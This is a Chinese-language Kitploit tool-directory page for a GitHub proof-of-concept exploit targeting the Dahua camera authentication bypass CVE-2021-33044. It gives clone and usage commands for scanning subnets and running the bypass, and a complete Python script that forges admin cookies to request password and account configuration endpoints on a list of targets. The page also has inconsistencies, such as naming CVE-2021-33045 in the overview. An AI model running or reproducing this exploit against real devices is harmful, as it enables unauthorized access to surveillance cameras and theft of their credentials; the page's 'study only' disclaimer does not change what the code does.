Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — 大华认证绕过(CVE-2021-33044)的PoC漏洞利用工具。可扫描子网、测试多个CVE,并通过构造的Cookie在无有效凭据的情况下导出设备配置。 | Kitploit
工具/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
身份验证与授权物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

DAHUA_AUTH-BYPASS-CVE-2021-33044

大华认证绕过(CVE-2021-33044)的PoC漏洞利用工具。可扫描子网、测试多个CVE,并通过构造的Cookie在无有效凭据的情况下导出设备配置。

查看仓库
1225个月前尚未审核

模拟 Dahua 身份验证绕过 PoC 漏洞利用(CVE-2021-33044)

概述

Dahua 网络摄像机是安防监控系统中常用的物联网设备。由于经常部署在内网或可从互联网访问,网络摄像机上的安全漏洞可能严重影响到隐私和信息安全。

CVE-2021-33045 是存在于多款 Dahua 摄像机系列中的安全漏洞,允许在无需有效身份验证的情况下,越权访问内部配置资源。该漏洞源于设备固件中访问控制机制不严密。

漏洞信息

项目内容
CVECVE-2021-33044
类型身份验证绕过
严重程度Critical(CVSS ~9.8)
认证无需身份验证
影响范围Dahua Camera / DVR / NVR

成因

该漏洞源于 Dahua 摄像机固件中不安全的身份验证设计:

  • 服务器未正确检查会话/令牌
  • 信任客户端发送的数据
  • 某些敏感的配置端点仅检查 cookie 是否存在,而不检查真实的访问权限

这允许攻击者:

  • 伪造身份验证过程
  • 完全绕过登录

参考:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

身份验证绕过机制的工作方式

正常流程

→ 客户端发送带有任意 cookie 的 HTTP 请求
→ 摄像机在界面层面检查 cookie
→ 后端不验证会话是否有效
→ 允许直接访问内部配置端点
→ 返回敏感数据

脚本说明

文件目的CVEs
dahua_scanner.py网络发现 —— 在子网中查找 Dahua 摄像机发现
dahua_exploit.py多 CVE 扫描工具 —— 检查所有安全漏洞。全部
dahua_auth_bypass.py专用身份验证绕过工具,带 --dump 选项CVE-2021-33044

使用方法

安装

# 克隆仓库
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

网络扫描

# 扫描子网(需要端口)
python dahua_scanner.py https://example.com -p 80 8080 8800

# 单台主机加端口
python dahua_scanner.py https://example.com

常见 Dahua 端口:80,443, 8080, 37777, 37778

漏洞利用 CVE

python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

身份验证绕过

python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # 绕过后转储设备信息

示例

#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

解释

  • 脚本使用 requests 库,并主动禁用 SSL 警告,用于关闭 SSL 告警提示

  • dump_accounts(ip, port=80) 函数是主函数,负责检测一台摄像机设备。 该函数的主要功能是:

    • 根据 IP 地址和端口构建 URL
    • 通过 cookie 模拟管理员登录状态
    • 向敏感的配置端点发送请求
    • 分析响应以判断设备是否受影响
  • 模拟身份验证 cookie。函数使用以下 cookie 值:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • 在受影响的摄像机版本中,后端不验证实际的 sessionID,导致系统误以为请求来自有效的管理员账户。

处理目标列表的循环

脚本从输入文件读取目标列表,并依次对每台设备调用检测函数。这种方法可以自动评估多台摄像机。

image

开发过程

这些脚本基于以下内容开发:

  • NVD 公布的 CVE 细节
  • Dahua 安全公告
  • 公开的 PoC 参考资料(seclists.org, packetstormsecurity)

测试状态:

  • 身份验证绕过逻辑根据 CVE 规范实现
  • 在易受攻击的设备上进行了有限的测试。

注意事项

本项目:

  • 仅用于学习和研究目的
  • 请在个人实验室环境中运行
下载工具